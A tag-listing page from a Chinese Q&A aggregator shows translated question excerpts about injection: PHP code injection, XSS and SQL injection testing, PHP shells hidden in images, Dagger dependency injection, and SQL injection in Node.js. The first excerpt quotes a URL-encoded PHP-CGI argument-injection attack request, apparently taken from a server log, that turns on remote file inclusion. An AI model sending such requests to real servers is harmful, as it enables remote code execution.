草庐IT

Inject

全部标签

php - 任何人都可以向我解释这个 php 代码注入(inject)攻击吗?

我一直在收到对我的服务器上的意外URL的请求。特别是/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6
php任何人sectioncodesecuritycode-injection

php - 应该如何使用 phpunit 测试 xss + sql 注入(inject)?

应该如何使用phpunitphpweb应用程序测试xss+sql注入(inject)?我想找到输出xss+其他攻击的程序来测试我的申请表。这个程序/服务应该随时更新新的xss和其他新的攻击。是否存在这样的服务/程序,如果不存在,它今天是如何完成的?如果可以,请举一些例子。(我用的是php5.3+zendframework+mysql)编辑:我问的是测试!而不是阻止我也知道的技术。谢谢,约瑟夫 最佳答案 我不认为你可以轻易地对这种事情进行单元测试。这将要求您的应用程序以有利于模拟其组件部分的方式编写,并且肯定涉及大量连续的手动工作(确
phpunitinjectnoreferrernoopenernofollowphpautomated-testsxsssql-injection

php - 可以将 php shell 注入(inject)到图像中吗?这将如何工作?

我记得看到一个图片上传功能的漏洞利用,它包括将恶意php代码隐藏在tiff图像中。我正在制作自己的图片上传脚本,我想我必须保护自己免受这种可能性的影响。除了,我不知道它是如何工作的。有谁知道隐藏在图像中的phpshell如何自行执行?是否需要以某种方式加载?谢谢。 最佳答案 重新编码图像不会阻止某人上传shell。防止它的唯一可靠方法是重新编码并扫描图像是否存在php标记。以PHPPNGshellthatwillsurvivere-encoding为例 关于php-可以将phpshell
phpinjectsectionshellcode-injection

java - 使用(外部)DI 容器(Dagger 1)在 Android 中进行适当的依赖注入(inject)

我目前正在开发(实际上是构建)一个带有蓝牙连接和HTTP通信以及RESTful服务的Android应用程序。我碰巧遇到了一个名为Dagger的“依赖注入(inject)”框架,它对我来说是非常具有革命性的。然而,我开始更多地思考依赖注入(inject)的“真正精神”,并且遇到了更多解释这个概念并实际上建议使用“构造函数注入(inject)”并将其他(字段和setter注入(inject))标记为“反注入(inject)”的博客文章/意见-图案。”我确实理解了他们对通过DI框架进行字段和setter注入(inject)的担忧,因为前者没有明确揭示对象的依赖关系,而后者也没有严格地“要求”
中进容器injectsectionjavaandroiddependency-injectioninversion-of-controldagger

android - 在 Dagger 2 中模拟注入(inject)的构造函数

我有一个具有依赖性的Activity:publicclassMyActivityextendsAppCompatActivity{@InjectDependency;@OverrideprotectedvoidonCreate(BundlesavedInstanceState){//inject}}publicclassDependency{@InjectpublicDependency(){//..}}由于Dependency有一个注入(inject)的构造函数,Dagger2不需要模块来知道如何实例化它,这非常方便。我的问题是:出于测试目的,我是否必须有一个提供Dependency
androidDaggerDependencycodesectiondagger-2

android - Dagger 2 - 如何只注入(inject)基本 Activity/fragment

我正在从许多来源研究Dagger2,例如:http://fernandocejas.com/2015/04/11/tasting-dagger-2-on-android/但我仍然没有找到问题的答案。我在处理相当复杂的应用程序,其中包含数十个fragment和几个我想在其中使用DI(dagger2)的Activity。对于所有这些fragment和Activity,我有一个BaseActivity和一个BaseFragment。但是,据我阅读和尝试,为了在我的MainActivity中使用@Inject,我必须在Component接口(interface)中指定它,并在onCreate方
ActivityfragmentinjectsectiononCreateandroiddependency-injectiondagger-2

android - Dagger 2 inject() 包含一个依赖循环

我在尝试迁移到Dagger2的Dagger中有以下设置:publicclassOrigin{finalAa;publicOrigin(Aa){this.a=a;}}publicclassA{finalBb;@InjectpublicA(Bb){this.b=b;}}publicclassB{finalLazya;@InjectpublicB(Lazya){this.a=a;}}然后在我的模块上我有:@Provides@SingletonOriginprovidesOrigin(Aa){returnnewOrigin(a);}问题是,即使我使用的是Lazy,Dagger2也会给我以下编译
androidDaggersectioncodepublicdagger-2

android - @Inject 设置不注入(inject)属性

我正在尝试使用AndroidDagger‡implementation并将DispatchingAndroidInjector注入(inject)到我的Application类中:classMyApp:Application(),HasActivityInjector{privatelateinitvardispatchingAndroidInjector:DispatchingAndroidInjector@InjectsetoverridefunonCreate(){super.onCreate()AppInjector.init(this)}overridefunactivity
androidInjectActivityThreadcodedependency-injectionkotlindagger-2

javascript - 防止 Node.js 中的 SQL 注入(inject)

是否有可能像PHP的PreparedStatements一样防止SQL注入(inject)在Node.js中(最好是模块)。如果是这样,怎么做?如果不是,有哪些示例可能会绕过我提供的代码(见下文)。一些上下文:我正在使用node-mysql制作一个带有由Node.js+MySql组成的后端堆栈的Web应用程序。模块。从可用性的Angular来看,这个模块很棒,但是它还没有实现类似于PHP的PreparedStatements的东西。(虽然我知道它在todo上)。据我了解,PHP对预处理语句的实现,除其他外,helpedgreatly在预防SQL注入(inject)方面。不过,我担心我的
javascriptinjectnode-mysqlmysqlnoreferrernode.jssql-injection

javascript - 防止 Node.js 中的 SQL 注入(inject)

是否有可能像PHP的PreparedStatements一样防止SQL注入(inject)在Node.js中(最好是模块)。如果是这样,怎么做?如果不是,有哪些示例可能会绕过我提供的代码(见下文)。一些上下文:我正在使用node-mysql制作一个带有由Node.js+MySql组成的后端堆栈的Web应用程序。模块。从可用性的Angular来看,这个模块很棒,但是它还没有实现类似于PHP的PreparedStatements的东西。(虽然我知道它在todo上)。据我了解,PHP对预处理语句的实现,除其他外,helpedgreatly在预防SQL注入(inject)方面。不过,我担心我的
javascriptinjectnode-mysqlmysqlnoreferrernode.jssql-injection
160161162163164165166